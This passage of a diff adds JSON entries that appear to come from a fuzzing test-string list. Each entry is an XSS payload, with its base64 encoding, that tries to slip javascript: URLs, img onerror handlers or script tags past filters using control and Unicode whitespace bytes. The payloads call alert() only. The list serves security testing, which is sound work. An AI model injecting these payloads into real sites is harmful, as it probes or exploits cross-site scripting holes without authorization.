+    "base64": "PGEgaHJlZj0iXHgwN2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4OSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(90)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMVx4OUFceDgwamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDkwKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(91)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgzamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDkxKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x04javascript:javascript:alert(92)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwNGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x01javascript:javascript:alert(93)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5MykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x08javascript:javascript:alert(94)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5NCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(95)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg0amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDk1KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(96)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg2amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDk2KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(97)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFM1x4ODBceDgwamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDk3KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x12javascript:javascript:alert(98)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxMmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5OCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Djavascript:javascript:alert(99)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwRGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5OSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Ajavascript:javascript:alert(100)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwQWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDApIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Cjavascript:javascript:alert(101)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwQ2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDEpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x15javascript:javascript:alert(102)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDIpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(103)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceEE4amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEwMykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x16javascript:javascript:alert(104)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxNmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDQpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x02javascript:javascript:alert(105)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwMmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDUpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Bjavascript:javascript:alert(106)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDYpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x06javascript:javascript:alert(107)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwNmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDcpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(108)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceEE5amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEwOCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(109)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg1amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEwOSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Ejavascript:javascript:alert(110)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxRWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMTApIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(111)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODFceDlGamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDExMSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Cjavascript:javascript:alert(112)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxQ2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMTIpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x00:javascript:alert(113)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MDA6amF2YXNjcmlwdDphbGVydCgxMTMpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x3A:javascript:alert(114)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4M0E6amF2YXNjcmlwdDphbGVydCgxMTQpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x09:javascript:alert(115)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MDk6amF2YXNjcmlwdDphbGVydCgxMTUpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x0D:javascript:alert(116)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MEQ6amF2YXNjcmlwdDphbGVydCgxMTYpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x0A:javascript:alert(117)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MEE6amF2YXNjcmlwdDphbGVydCgxMTcpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(118)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MEFvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTE4KT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x22onerror=javascript:alert(119)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MjJvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTE5KT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(120)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MEJvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIwKT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(121)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MERvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIxKT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(122)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MkZvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIyKT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x09onerror=javascript:alert(123)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MDlvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIzKT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(124)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MENvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI0KT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x00onerror=javascript:alert(125)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MDBvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI1KT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x27onerror=javascript:alert(126)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MjdvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI2KT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x20onerror=javascript:alert(127)>",
+    "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MjBvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI3KT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x3Bjavascript:alert(128)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgzQmphdmFzY3JpcHQ6YWxlcnQoMTI4KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Djavascript:alert(129)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgwRGphdmFzY3JpcHQ6YWxlcnQoMTI5KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(130)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFRlx4QkJceEJGamF2YXNjcmlwdDphbGVydCgxMzApPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x81javascript:alert(131)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgxamF2YXNjcmlwdDphbGVydCgxMzEpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x84javascript:alert(132)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg0amF2YXNjcmlwdDphbGVydCgxMzIpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE3\\x80\\x80javascript:alert(133)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFM1x4ODBceDgwamF2YXNjcmlwdDphbGVydCgxMzMpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x09javascript:alert(134)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgwOWphdmFzY3JpcHQ6YWxlcnQoMTM0KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x89javascript:alert(135)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg5amF2YXNjcmlwdDphbGVydCgxMzUpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x85javascript:alert(136)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg1amF2YXNjcmlwdDphbGVydCgxMzYpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x88javascript:alert(137)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg4amF2YXNjcmlwdDphbGVydCgxMzcpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x00javascript:alert(138)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgwMGphdmFzY3JpcHQ6YWxlcnQoMTM4KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\xA8javascript:alert(139)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEE4amF2YXNjcmlwdDphbGVydCgxMzkpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(140)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDhBamF2YXNjcmlwdDphbGVydCgxNDApPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE1\\x9A\\x80javascript:alert(141)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMVx4OUFceDgwamF2YXNjcmlwdDphbGVydCgxNDEpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Cjavascript:alert(142)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgwQ2phdmFzY3JpcHQ6YWxlcnQoMTQyKTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x2Bjavascript:alert(143)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgyQmphdmFzY3JpcHQ6YWxlcnQoMTQzKTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(144)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhGMFx4OTBceDk2XHg5QWphdmFzY3JpcHQ6YWxlcnQoMTQ0KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>-javascript:alert(145)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+LWphdmFzY3JpcHQ6YWxlcnQoMTQ1KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Ajavascript:alert(146)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgwQWphdmFzY3JpcHQ6YWxlcnQoMTQ2KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(147)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEFGamF2YXNjcmlwdDphbGVydCgxNDcpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x7Ejavascript:alert(148)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHg3RWphdmFzY3JpcHQ6YWxlcnQoMTQ4KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x87javascript:alert(149)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg3amF2YXNjcmlwdDphbGVydCgxNDkpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(150)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODFceDlGamF2YXNjcmlwdDphbGVydCgxNTApPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\xA9javascript:alert(151)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEE5amF2YXNjcmlwdDphbGVydCgxNTEpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xC2\\x85javascript:alert(152)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhDMlx4ODVqYXZhc2NyaXB0OmFsZXJ0KDE1Mik8L3NjcmlwdD4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(153)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFRlx4QkZceEFFamF2YXNjcmlwdDphbGVydCgxNTMpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x83javascript:alert(154)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgzamF2YXNjcmlwdDphbGVydCgxNTQpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(155)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDhCamF2YXNjcmlwdDphbGVydCgxNTUpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(156)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFRlx4QkZceEJFamF2YXNjcmlwdDphbGVydCgxNTYpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x80javascript:alert(157)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgwamF2YXNjcmlwdDphbGVydCgxNTcpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x21javascript:alert(158)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgyMWphdmFzY3JpcHQ6YWxlcnQoMTU4KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x82javascript:alert(159)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgyamF2YXNjcmlwdDphbGVydCgxNTkpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x86javascript:alert(160)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg2amF2YXNjcmlwdDphbGVydCgxNjApPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(161)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhFMVx4QTBceDhFamF2YXNjcmlwdDphbGVydCgxNjEpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Bjavascript:alert(162)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgwQmphdmFzY3JpcHQ6YWxlcnQoMTYyKTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x20javascript:alert(163)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHgyMGphdmFzY3JpcHQ6YWxlcnQoMTYzKTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xC2\\xA0javascript:alert(164)</script>",
+    "base64": "ImAnPjxzY3JpcHQ+XHhDMlx4QTBqYXZhc2NyaXB0OmFsZXJ0KDE2NCk8L3NjcmlwdD4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x00src=x onerror=\"alert(165)\">",
+    "base64": "PGltZyBceDAwc3JjPXggb25lcnJvcj0iYWxlcnQoMTY1KSI+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x47src=x onerror=\"javascript:alert(166)\">",
+    "base64": "PGltZyBceDQ3c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNjYpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x11src=x onerror=\"javascript:alert(167)\">",
+    "base64": "PGltZyBceDExc3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNjcpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x12src=x onerror=\"javascript:alert(168)\">",
+    "base64": "PGltZyBceDEyc3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNjgpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x47src=x onerror=\"javascript:alert(169)\">",
+    "base64": "PGltZ1x4NDdzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE2OSkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x10src=x onerror=\"javascript:alert(170)\">",
+    "base64": "PGltZ1x4MTBzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MCkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x13src=x onerror=\"javascript:alert(171)\">",
+    "base64": "PGltZ1x4MTNzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MSkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x32src=x onerror=\"javascript:alert(172)\">",
+    "base64": "PGltZ1x4MzJzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MikiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x47src=x onerror=\"javascript:alert(173)\">",
+    "base64": "PGltZ1x4NDdzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MykiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x11src=x onerror=\"javascript:alert(174)\">",
+    "base64": "PGltZ1x4MTFzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3NCkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x47src=x onerror=\"javascript:alert(175)\">",
